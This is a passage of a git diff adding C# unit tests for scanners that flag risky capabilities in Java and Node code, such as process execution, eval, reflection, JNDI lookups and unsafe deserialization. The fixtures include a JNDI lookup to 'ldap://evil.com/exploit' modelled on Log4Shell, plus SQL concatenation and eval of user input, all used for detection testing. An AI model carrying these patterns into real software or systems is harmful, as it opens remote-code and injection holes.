+ [Fact]
+ public void ScanFile_DetectsExecuteQuery()
+ {
+ const string code = @"ResultSet rs = stmt.executeQuery(sql);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("Statement.executeQuery", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSqlStringConcatenation()
+ {
+ const string code = @"String sql = ""SELECT * FROM users WHERE id="" + userId;";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Contains("SQL", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsCreateNativeQuery()
+ {
+ const string code = @"Query q = em.createNativeQuery(""SELECT * FROM users"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("Native SQL query", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Dynamic Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsScriptEngineManager()
+ {
+ const string code = @"ScriptEngine engine = new ScriptEngineManager().getEngineByName(""javascript"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.DynamicCode);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsScriptEngineEval()
+ {
+ const string code = @"Object result = engine.eval(script);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("ScriptEngine.eval", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSpelExpressionParser()
+ {
+ const string code = @"SpelExpressionParser parser = new SpelExpressionParser();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("SpEL Parser", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOgnlGetValue()
+ {
+ const string code = @"Object value = Ognl.getValue(expression, context, root);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("OGNL.getValue", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJavaCompiler()
+ {
+ const string code = @"JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("JavaCompiler", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Reflection Patterns
+
+ [Fact]
+ public void ScanFile_DetectsClassForName()
+ {
+ const string code = @"Class> clazz = Class.forName(""com.example.MyClass"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Class.forName", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsMethodInvoke()
+ {
+ const string code = @"Object result = Method.invoke(obj, args);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("Method.invoke", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSetAccessibleTrue()
+ {
+ const string code = @"method.setAccessible(true);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("setAccessible(true)", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsURLClassLoader()
+ {
+ const string code = @"URLClassLoader loader = new URLClassLoader(urls);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("URLClassLoader", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsDefineClass()
+ {
+ const string code = @"Class> clazz = loader.defineClass(name, bytes, 0, bytes.length);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("defineClass", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Native Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsSystemLoadLibrary()
+ {
+ const string code = @"System.loadLibrary(""mylib"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("System.loadLibrary", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSystemLoad()
+ {
+ const string code = @"System.load(""/path/to/libmylib.so"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("System.load", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNativeMethodDeclaration()
+ {
+ const string code = @"private native int doSomething(byte[] data);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("native method", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUnsafeGetUnsafe()
+ {
+ const string code = @"Unsafe unsafe = Unsafe.getUnsafe();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("Unsafe.getUnsafe", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUnsafeAllocateInstance()
+ {
+ const string code = @"Object obj = unsafe.allocateInstance(clazz);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("Unsafe.allocateInstance", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - JNDI Patterns (Log4Shell attack vector)
+
+ [Fact]
+ public void ScanFile_DetectsInitialContext()
+ {
+ const string code = @"InitialContext ctx = new InitialContext();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind); // JNDI is categorized as Other
+ Assert.Equal("InitialContext", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsInitialContextLookup()
+ {
+ const string code = @"Object obj = InitialContext.lookup(""java:comp/env/jdbc/mydb"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("InitialContext.lookup", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJndiRemoteLookup()
+ {
+ const string code = @"ctx.lookup(""ldap://evil.com/exploit"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Pattern == "JNDI remote lookup" && r.Risk == CapabilityRisk.Critical);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsInitialLdapContext()
+ {
+ const string code = @"LdapContext ctx = new InitialLdapContext(env, null);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Other, result[0].Kind);
+ Assert.Equal("InitialLdapContext", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region JavaCapabilityEvidence Tests
+
+ [Fact]
+ public void Evidence_DeduplicationKey_IsCorrect()
+ {
+ var evidence = new JavaCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.java",
+ 10,
+ "Runtime.exec");
+
+ Assert.Equal("Exec|Test.java|10|Runtime.exec", evidence.DeduplicationKey);
+ }
+
+ [Fact]
+ public void Evidence_ConfidenceIsClamped()
+ {
+ var evidence1 = new JavaCapabilityEvidence(
+ CapabilityKind.Exec, "Test.java", 1, "pattern",
+ confidence: 2.0f);
+ var evidence2 = new JavaCapabilityEvidence(
+ CapabilityKind.Exec, "Test.java", 1, "pattern",
+ confidence: -1.0f);
+
+ Assert.Equal(1.0f, evidence1.Confidence);
+ Assert.Equal(0.0f, evidence2.Confidence);
+ }
+
+ [Fact]
+ public void Evidence_CreateMetadata_IncludesAllFields()
+ {
+ var evidence = new JavaCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.java",
+ 10,
+ "Runtime.exec",
+ snippet: "Runtime.getRuntime().exec(cmd);",
+ confidence: 0.95f,
+ risk: CapabilityRisk.Critical);
+
+ var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
+
+ Assert.Equal("exec", metadata["capability.kind"]);
+ Assert.Equal("Test.java:10", metadata["capability.source"]);
+ Assert.Equal("Runtime.exec", metadata["capability.pattern"]);
+ Assert.Equal("critical", metadata["capability.risk"]);
+ Assert.Equal("0.95", metadata["capability.confidence"]);
+ Assert.Contains("Runtime.getRuntime()", metadata["capability.snippet"]);
+ }
+
+ [Fact]
+ public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
+ {
+ var evidence = new JavaCapabilityEvidence(
+ CapabilityKind.Exec,
+ "Test.java",
+ 10,
+ "Runtime.exec");
+
+ var langEvidence = evidence.ToLanguageEvidence();
+
+ Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
+ Assert.Equal("Test.java", langEvidence.Source);
+ Assert.Equal("line:10", langEvidence.Locator);
+ Assert.Equal("Exec:Runtime.exec", langEvidence.Value);
+ }
+
+ #endregion
+}
diff --git a/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Node.Tests/Internal/NodeCapabilityScannerTests.cs b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Node.Tests/Internal/NodeCapabilityScannerTests.cs
new file mode 100644
index 000000000..e7935a1ca
--- /dev/null
+++ b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Node.Tests/Internal/NodeCapabilityScannerTests.cs
@@ -0,0 +1,883 @@
+using StellaOps.Scanner.Analyzers.Lang.Node.Internal.Capabilities;
+
+namespace StellaOps.Scanner.Analyzers.Lang.Node.Tests.Internal;
+
+///
+/// Tests for .
+///
+public sealed class NodeCapabilityScannerTests
+{
+ private const string TestFile = "test.js";
+
+ #region ScanFile - General Tests
+
+ [Fact]
+ public void ScanFile_NullContent_ReturnsEmpty()
+ {
+ var result = NodeCapabilityScanner.ScanFile(null!, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_EmptyContent_ReturnsEmpty()
+ {
+ var result = NodeCapabilityScanner.ScanFile("", TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_WhitespaceContent_ReturnsEmpty()
+ {
+ var result = NodeCapabilityScanner.ScanFile(" \n\t\n ", TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NoPatterns_ReturnsEmpty()
+ {
+ const string code = @"
+function hello() {
+ console.log('Hello, World!');
+}
+hello();";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NormalizesBackslashesInPath()
+ {
+ const string code = @"const cp = require('child_process');";
+ var result = NodeCapabilityScanner.ScanFile(code, @"C:\src\test.js").ToList();
+
+ Assert.Single(result);
+ Assert.Equal("C:/src/test.js", result[0].SourceFile);
+ }
+
+ #endregion
+
+ #region ScanFile - Comment Stripping
+
+ [Fact]
+ public void ScanFile_IgnoresSingleLineComments()
+ {
+ const string code = @"
+// const cp = require('child_process');
+function test() { }";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresMultiLineComments()
+ {
+ const string code = @"
+/*
+const cp = require('child_process');
+eval('code');
+*/
+function test() { }";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_DoesNotIgnoreCodeInStrings()
+ {
+ const string code = @"const msg = 'require(""child_process"")';";
+ // This should NOT match because it's a string literal
+ // The scanner should be smart about this
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ // Note: Current implementation may still detect patterns in strings
+ // This test documents expected behavior - may need adjustment based on implementation
+ }
+
+ #endregion
+
+ #region ScanFile - Exec Patterns (Critical)
+
+ [Fact]
+ public void ScanFile_DetectsRequireChildProcess()
+ {
+ const string code = @"const cp = require('child_process');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("require('child_process')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ Assert.Equal(1.0f, result[0].Confidence);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsImportChildProcess()
+ {
+ const string code = @"import { exec } from 'child_process';";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.Exec);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsChildProcessExec()
+ {
+ const string code = @"child_process.exec('ls -la', callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("child_process.exec", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsChildProcessExecSync()
+ {
+ const string code = @"const output = child_process.execSync('pwd');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("child_process.execSync", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsChildProcessSpawn()
+ {
+ const string code = @"const proc = child_process.spawn('node', ['app.js']);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("child_process.spawn", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsChildProcessFork()
+ {
+ const string code = @"const worker = child_process.fork('./worker.js');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("child_process.fork", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireExeca()
+ {
+ const string code = @"const execa = require('execa');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("require('execa')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireShelljs()
+ {
+ const string code = @"const shell = require('shelljs');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("require('shelljs')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessBinding()
+ {
+ const string code = @"const spawn = process.binding('spawn_sync');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("process.binding", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Filesystem Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireFs()
+ {
+ const string code = @"const fs = require('fs');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("require('fs')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireFsPromises()
+ {
+ const string code = @"const fs = require('fs/promises');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("require('fs/promises')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsReadFile()
+ {
+ const string code = @"fs.readFile('data.txt', callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.readFile", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsWriteFile()
+ {
+ const string code = @"fs.writeFile('output.txt', data, callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.writeFile", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsUnlink()
+ {
+ const string code = @"fs.unlink('file.txt', callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.unlink", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsRm()
+ {
+ const string code = @"fs.rm('directory', { recursive: true }, callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.rm", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsChmod()
+ {
+ const string code = @"fs.chmod('script.sh', 0o755, callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.chmod", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFsSymlink()
+ {
+ const string code = @"fs.symlink('target', 'link', callback);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("fs.symlink", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Network Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireNet()
+ {
+ const string code = @"const net = require('net');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("require('net')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireHttp()
+ {
+ const string code = @"const http = require('http');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("require('http')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNetCreateServer()
+ {
+ const string code = @"const server = net.createServer(handler);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("net.createServer", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFetch()
+ {
+ const string code = @"const response = await fetch('https://api.example.com');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("fetch", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireAxios()
+ {
+ const string code = @"const axios = require('axios');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("require('axios')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewWebSocket()
+ {
+ const string code = @"const ws = new WebSocket('ws://localhost:8080');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("WebSocket", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Environment Patterns
+
+ [Fact]
+ public void ScanFile_DetectsProcessEnv()
+ {
+ const string code = @"const apiKey = process.env.API_KEY;";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.Environment);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessEnvBracket()
+ {
+ const string code = @"const value = process.env['MY_VAR'];";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.Environment);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireDotenv()
+ {
+ const string code = @"require('dotenv').config();";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("require('dotenv')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessChdir()
+ {
+ const string code = @"process.chdir('/app');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("process.chdir", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Serialization Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireNodeSerialize()
+ {
+ const string code = @"const serialize = require('node-serialize');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("require('node-serialize')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNodeSerializeUnserialize()
+ {
+ const string code = @"const obj = serialize.unserialize(data);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("node-serialize.unserialize", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsYamlLoad()
+ {
+ const string code = @"const config = yaml.load(yamlString);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("yaml.load", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsV8Deserialize()
+ {
+ const string code = @"const obj = v8.deserialize(buffer);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("v8.deserialize", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Crypto Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireCrypto()
+ {
+ const string code = @"const crypto = require('crypto');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("require('crypto')", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsCryptoCreateHash()
+ {
+ const string code = @"const hash = crypto.createHash('sha256');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("crypto.createHash", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsWeakHashAlgorithm()
+ {
+ const string code = @"const hash = crypto.createHash('md5');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Pattern == "Weak hash algorithm" && r.Risk == CapabilityRisk.High);
+ }
+
+ #endregion
+
+ #region ScanFile - Database Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRequireMysql()
+ {
+ const string code = @"const mysql = require('mysql');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("require('mysql')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequirePg()
+ {
+ const string code = @"const { Pool } = require('pg');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("require('pg')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireMongodb()
+ {
+ const string code = @"const { MongoClient } = require('mongodb');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("require('mongodb')", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSqlStringConcatenation()
+ {
+ const string code = @"const sql = 'SELECT * FROM users WHERE id=' + id;";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("SQL string concatenation", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Dynamic Code Patterns (Critical)
+
+ [Fact]
+ public void ScanFile_DetectsEval()
+ {
+ const string code = @"const result = eval(userInput);";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("eval", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewFunction()
+ {
+ const string code = @"const fn = new Function('a', 'b', 'return a + b');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("new Function", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRequireVm()
+ {
+ const string code = @"const vm = require('vm');";
+ var result = NodeCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
